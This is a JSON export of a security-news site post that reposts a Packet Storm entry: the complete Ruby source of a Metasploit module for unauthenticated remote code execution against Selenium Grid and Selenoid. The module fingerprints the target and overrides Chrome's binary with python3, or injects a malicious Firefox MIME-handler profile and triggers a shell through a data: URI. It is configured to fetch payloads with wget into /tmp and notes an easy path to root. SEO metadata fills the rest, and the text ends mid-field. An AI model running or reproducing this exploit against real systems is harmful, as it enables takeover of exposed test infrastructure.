{"id":46752,"date":"2026-04-14T12:47:09","date_gmt":"2026-04-14T12:47:09","guid":{"rendered":"http:\/\/localhost\/?p=46752"},"modified":"2026-04-14T12:47:09","modified_gmt":"2026-04-14T12:47:09","slug":"selenium-gridselenoid-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46752","title":{"rendered":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-14T17:29:50&#8243;,&#8221;description&#8221;:&#8221;Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an attacker can achieve remote code execution through two browser-specific&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-14T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-14T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218909&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Module::Deprecated\\n      moved_from &#8216;exploit\/linux\/http\/selenium_greed_chrome_rce_cve_2022_28108&#8217;\\n      moved_from &#8216;exploit\/linux\/http\/selenium_greed_firefox_rce_cve_2022_28108&#8217;\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::FileDropper\\n      include Msf::Payload::Python\\n      prepend Msf::Exploit::Remote::AutoCheck\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Selenium Grid\/Selenoid Unauthenticated RCE&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              Selenium Grid and Selenoid expose a WebDriver API that allows creating\\n              browser sessions with arbitrary capabilities. When deployed without\\n              authentication (the default for both), an attacker can achieve remote\\n              code execution through two browser-specific techniques:\\n    \\n              For Chrome, the goog:chromeOptions binary field can be set to an\\n              arbitrary executable such as \/usr\/bin\/python3, since ChromeDriver does\\n              not validate it. This was fixed in Selenium Grid 4.11.0 via the\\n              stereotype capabilities merge. All Selenoid versions remain vulnerable.\\n    \\n              For Firefox, a custom profile containing a malicious MIME handler that\\n              maps application\/sh to \/bin\/sh can be injected via moz:firefoxOptions.\\n              Navigating to a data: URI with that content type triggers shell\\n              execution. This technique has never been patched and works on all\\n              Selenium Grid versions including the latest release.\\n    \\n              The module auto-detects available browsers and selects the best attack\\n              vector. Firefox is preferred as it works on all Grid versions.\\n    \\n              The default Docker images run as seluser\/selenium with passwordless\\n              sudo, allowing trivial privilege escalation to root.\\n            },\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;Jon Stratton&#8217;,\\n              &#8216;Wiz Research&#8217;,\\n              &#8216;Takahiro Yokoyama&#8217;,\\n              &#8216;Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e&#8217;\\n            ],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.wiz.io\/blog\/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.selenium.dev\/blog\/2024\/protecting-unsecured-selenium-grid\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/SeleniumHQ\/selenium\/issues\/9526&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/JonStratton\/selenium-node-takeover-kit\/tree\/master&#8217;],\\n              [&#8216;EDB&#8217;, &#8216;49915&#8217;],\\n              [&#8216;CWE&#8217;, &#8216;306&#8217;]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e %w[python unix linux],\\n            &#8216;Arch&#8217; =\\u003e [ARCH_PYTHON, ARCH_CMD],\\n            &#8216;Payload&#8217; =\\u003e {},\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Python In-Memory&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;python&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_PYTHON\\n                }\\n              ],\\n              [\\n                &#8216;Unix\/Linux Command Shell&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e %w[unix linux],\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;FETCH_COMMAND&#8217; =\\u003e &#8216;WGET&#8217;,\\n                    &#8216;FETCH_DELETE&#8217; =\\u003e true,\\n                    &#8216;FETCH_WRITABLE_DIR&#8217; =\\u003e &#8216;\/tmp&#8217;\\n                  }\\n                }\\n              ]\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2021-05-28&#8217;,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION]\\n            }\\n          )\\n        )\\n    \\n        register_options([\\n          Opt::RPORT(4444),\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path to Selenium Grid or Selenoid&#8217;, &#8216;\/&#8217;]),\\n          OptEnum.new(&#8216;BROWSER&#8217;, [true, &#8216;Browser to exploit (auto detects and picks best vector)&#8217;, &#8216;auto&#8217;, %w[auto firefox chrome]])\\n        ])\\n      end\\n    \\n      def check\\n        @backend = detect_backend\\n        return CheckCode::Unknown(&#8216;No response from target&#8217;) unless @backend\\n    \\n        @browsers = enumerate_browsers\\n        return CheckCode::Appears(\\&#8221;#{@backend[:message]} (all versions vulnerable)\\&#8221;) if selenoid?\\n    \\n        check_grid\\n      end\\n    \\n      def exploit\\n        @backend ||= detect_backend\\n        @browsers ||= enumerate_browsers\\n        browser = select_browser\\n        fail_with(Failure::NoTarget, &#8216;No exploitable browser found on target&#8217;) unless browser\\n    \\n        send(\\&#8221;exploit_#{browser}\\&#8221;)\\n      end\\n    \\n      private\\n    \\n      def selenoid?\\n        @backend\\u0026.dig(:type) == :selenoid\\n      end\\n    \\n      def session_path\\n        normalize_uri(target_uri.path, selenoid? ? &#8216;wd\/hub\/session&#8217; : &#8216;session&#8217;)\\n      end\\n    \\n      def grid_version\\n        nodes = @backend\\u0026.dig(:value, &#8216;nodes&#8217;)\\n        return unless nodes.is_a?(Array) \\u0026\\u0026 !nodes.empty?\\n    \\n        version_raw = nodes.first[&#8216;version&#8217;]\\n        return unless version_raw\\n    \\n        version_raw.split(\/\\\\s\/).first\\n      end\\n    \\n      def chrome_vuln?\\n        return true if selenoid?\\n    \\n        ver = grid_version\\n        ver \\u0026\\u0026 Rex::Version.new(ver) \\u003c Rex::Version.new(&#8216;4.11.0&#8217;) \\u0026\\u0026 @browsers.include?(&#8216;chrome&#8217;)\\n      end\\n    \\n      def detect_backend\\n        %w[status wd\/hub\/status].each do |path|\\n          res = send_request_cgi(&#8216;method&#8217; =\\u003e &#8216;GET&#8217;, &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, path))\\n          next unless res\\u0026.code == 200\\n    \\n          value = res.get_json_document[&#8216;value&#8217;]\\n          next unless value.is_a?(Hash) \\u0026\\u0026 value[&#8216;message&#8217;].is_a?(String)\\n    \\n          msg = value[&#8216;message&#8217;].downcase\\n          return { type: :selenoid, message: value[&#8216;message&#8217;], value: value } if msg.include?(&#8216;selenoid&#8217;)\\n          return { type: :grid, message: value[&#8216;message&#8217;], value: value } if msg.include?(&#8216;selenium grid&#8217;)\\n        end\\n        nil\\n      end\\n    \\n      def enumerate_browsers\\n        return [] unless @backend\\n        return selenoid_browsers if selenoid?\\n    \\n        grid_browsers\\n      end\\n    \\n      def selenoid_browsers\\n        browsers = @backend[:value][&#8216;browsers&#8217;]\\n        return %w[chrome firefox] unless browsers.is_a?(Hash)\\n    \\n        browsers.keys.map(\\u0026:downcase)\\n      end\\n    \\n      def grid_browsers\\n        nodes = @backend[:value][&#8216;nodes&#8217;]\\n        return [] unless nodes.is_a?(Array)\\n    \\n        nodes.flat_map { |n| (n[&#8216;slots&#8217;] || []).map { |s| s.dig(&#8216;stereotype&#8217;, &#8216;browserName&#8217;)\\u0026.downcase } }.compact.uniq\\n      end\\n    \\n      def check_grid\\n        ver_str = grid_version\\n        return CheckCode::Detected(&#8216;Selenium Grid detected but could not determine version&#8217;) unless ver_str\\n        return CheckCode::Appears(\\&#8221;Selenium Grid #{ver_str} with Firefox (all versions vulnerable to profile handler)\\&#8221;) if @browsers.include?(&#8216;firefox&#8217;)\\n        return CheckCode::Appears(\\&#8221;Selenium Grid #{ver_str} with Chrome (vulnerable to binary override)\\&#8221;) if chrome_vuln?\\n        return CheckCode::Safe(\\&#8221;Selenium Grid #{ver_str} &#8211; Chrome patched (stereotype merge), no Firefox available\\&#8221;) if @browsers.include?(&#8216;chrome&#8217;)\\n    \\n        CheckCode::Detected(\\&#8221;Selenium Grid #{ver_str} &#8211; no exploitable browsers found\\&#8221;)\\n      end\\n    \\n      def select_browser\\n        choice = datastore[&#8216;BROWSER&#8217;]\\n    \\n        if choice != &#8216;auto&#8217;\\n          print_warning(\\&#8221;#{choice} not available on target (found: #{@browsers.join(&#8216;, &#8216;)})\\&#8221;) unless @browsers.empty? || @browsers.include?(choice)\\n          return choice\\n        end\\n    \\n        if @browsers.include?(&#8216;firefox&#8217;)\\n          print_status(&#8216;Auto-selected Firefox (profile handler &#8211; works on all Grid versions)&#8217;)\\n          return &#8216;firefox&#8217;\\n        end\\n    \\n        if @browsers.include?(&#8216;chrome&#8217;) \\u0026\\u0026 chrome_vuln?\\n          print_status(&#8216;Auto-selected Chrome (binary override)&#8217;)\\n          return &#8216;chrome&#8217;\\n        end\\n    \\n        print_warning(\\&#8221;Chrome binary override patched on Grid #{grid_version}, no Firefox available\\&#8221;) if @browsers.include?(&#8216;chrome&#8217;)\\n        nil\\n      end\\n    \\n      def create_session(body)\\n        send_request_cgi(&#8216;method&#8217; =\\u003e &#8216;POST&#8217;, &#8216;uri&#8217; =\\u003e session_path, &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;, &#8216;data&#8217; =\\u003e body)\\n      end\\n    \\n      def cleanup_session(session_id)\\n        res = send_request_cgi(&#8216;method&#8217; =\\u003e &#8216;DELETE&#8217;, &#8216;uri&#8217; =\\u003e normalize_uri(session_path, session_id), &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;)\\n        print_status(res ? \\&#8221;Deleted session #{session_id}\\&#8221; : \\&#8221;Could not delete session #{session_id}. It may need to expire.\\&#8221;)\\n      rescue StandardError\\n        nil\\n      end\\n    \\n      def exploit_chrome\\n        body = {\\n          &#8216;capabilities&#8217; =\\u003e {\\n            &#8216;alwaysMatch&#8217; =\\u003e {\\n              &#8216;browserName&#8217; =\\u003e &#8216;chrome&#8217;,\\n              &#8216;goog:chromeOptions&#8217; =\\u003e { &#8216;binary&#8217; =\\u003e &#8216;\/usr\/bin\/python3&#8217;, &#8216;args&#8217; =\\u003e [\\&#8221;-c#{build_python_payload}\\&#8221;] }\\n            }\\n          }\\n        }.to_json\\n    \\n        print_status(&#8216;Sending Chrome session request with binary override&#8230;&#8217;)\\n        res = create_session(body)\\n    \\n        return print_warning(&#8216;No response received (expected &#8211; Python exits after execution)&#8217;) unless res\\n        return print_good(&#8216;Payload executed (server returned 500 as expected)&#8217;) if res.code == 500\\n    \\n        fail_with(Failure::UnexpectedReply, \\&#8221;Unexpected HTTP #{res.code}\\&#8221;) unless res.code == 200\\n    \\n        json = res.get_json_document\\n        return print_good(\\&#8221;Payload executed (Chrome crash expected: #{json[&#8216;value&#8217;][&#8216;message&#8217;]\\u0026.slice(0, 80)}&#8230;)\\&#8221;) if json.dig(&#8216;value&#8217;, &#8216;error&#8217;)\\n    \\n        session_id = json.dig(&#8216;value&#8217;, &#8216;sessionId&#8217;)\\n        return unless session_id\\n    \\n        print_warning(\\&#8221;Session #{session_id} created but binary override may have been ignored\\&#8221;)\\n        cleanup_session(session_id)\\n      end\\n    \\n      def build_python_payload\\n        inner = target[&#8216;Arch&#8217;] == ARCH_PYTHON ? payload.encoded : \\&#8221;os.system(#{payload.encoded.inspect})\\&#8221;\\n        py_create_exec_stub(\\&#8221;import os,time\\\\npid=os.fork()\\\\nif pid==0:\\\\n os.setsid()\\\\n #{inner}\\\\nelse:\\\\n time.sleep(300)\\&#8221;)\\n      end\\n    \\n      def exploit_firefox\\n        encoded_profile = build_malicious_profile\\n        body = {\\n          &#8216;desiredCapabilities&#8217; =\\u003e { &#8216;browserName&#8217; =\\u003e &#8216;firefox&#8217;, &#8216;firefox_profile&#8217; =\\u003e encoded_profile },\\n          &#8216;capabilities&#8217; =\\u003e { &#8216;firstMatch&#8217; =\\u003e [{ &#8216;browserName&#8217; =\\u003e &#8216;firefox&#8217;, &#8216;moz:firefoxOptions&#8217; =\\u003e { &#8216;profile&#8217; =\\u003e encoded_profile } }] }\\n        }.to_json\\n    \\n        print_status(&#8216;Creating Firefox session with malicious profile&#8230;&#8217;)\\n        res = create_session(body)\\n        fail_with(Failure::UnexpectedReply, &#8216;No response when creating session&#8217;) unless res\\n    \\n        session_id = res.get_json_document.dig(&#8216;value&#8217;, &#8216;sessionId&#8217;) || res.get_json_document[&#8216;sessionId&#8217;]\\n        fail_with(Failure::UnexpectedReply, &#8216;Failed to create Firefox session&#8217;) unless session_id\\n        print_status(\\&#8221;Session created: #{session_id}\\&#8221;)\\n    \\n        cmd = payload.encoded\\n        cmd = \\&#8221;echo -n #{Rex::Text.encode_base64(cmd)} | base64 -d | python3 \\u0026\\&#8221; if target[&#8216;Arch&#8217;] == ARCH_PYTHON\\n        script = \\&#8221;#{cmd}\\\\n\\&#8221;\\n    \\n        fetch_dir = datastore[&#8216;FETCH_WRITABLE_DIR&#8217;] || &#8216;\/tmp&#8217;\\n        fetch_file = datastore[&#8216;FETCH_FILENAME&#8217;]\\n        register_file_for_cleanup(\\&#8221;#{fetch_dir}\/#{fetch_file}\\&#8221;) if fetch_file\\n    \\n        print_status(&#8216;Navigating to data: URI to trigger handler&#8230;&#8217;)\\n        send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, selenoid? ? &#8216;wd\/hub&#8217; : &#8221;, \\&#8221;session\/#{session_id}\/url\\&#8221;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e { &#8216;url&#8217; =\\u003e \\&#8221;data:application\/sh;charset=utf-16le;base64,#{Rex::Text.encode_base64(script)}\\&#8221; }.to_json\\n        )\\n    \\n        cleanup_session(session_id)\\n      end\\n    \\n      def build_malicious_profile\\n        stringio = Zip::OutputStream.write_buffer do |io|\\n          io.put_next_entry(&#8216;handlers.json&#8217;)\\n          io.write({\\n            &#8216;defaultHandlersVersion&#8217; =\\u003e { &#8216;en-US&#8217; =\\u003e 4 },\\n            &#8216;mimeTypes&#8217; =\\u003e { &#8216;application\/sh&#8217; =\\u003e { &#8216;action&#8217; =\\u003e 2, &#8216;handlers&#8217; =\\u003e [{ &#8216;name&#8217; =\\u003e &#8216;sh&#8217;, &#8216;path&#8217; =\\u003e &#8216;\/bin\/sh&#8217; }] } }\\n          }.to_json)\\n        end\\n        stringio.rewind\\n        Base64.strict_encode64(stringio.sysread)\\n      end\\n    \\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218909&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218909\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-14T17:29:50&#8243;,&#8221;description&#8221;:&#8221;Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-46752","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46752\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-14T17:29:50&#8243;,&#8221;description&#8221;:&#8221;Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46752\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-14T12:47:09+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Selenium Grid\\\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909\",\"datePublished\":\"2026-04-14T12:47:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752\"},\"wordCount\":1856,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46752#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752\",\"name\":\"\ud83d\udcc4 Selenium Grid\\\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-14T12:47:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46752\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46752#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Selenium Grid\\\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46752","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-14T17:29:50&#8243;,&#8221;description&#8221;:&#8221;Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an...","og_url":"https:\/\/zero.redgem.net\/?p=46752","og_site_name":"zero redgem","article_published_time":"2026-04-14T12:47:09+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46752#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46752"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909","datePublished":"2026-04-14T12:47:09+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46752"},"wordCount":1856,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46752#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46752","url":"https:\/\/zero.redgem.net\/?p=46752","name":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-14T12:47:09+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46752#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46752"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46752#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Selenium Grid\/Selenoid Unauthenticated Remote Code Execution_PACKETSTORM:218909"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 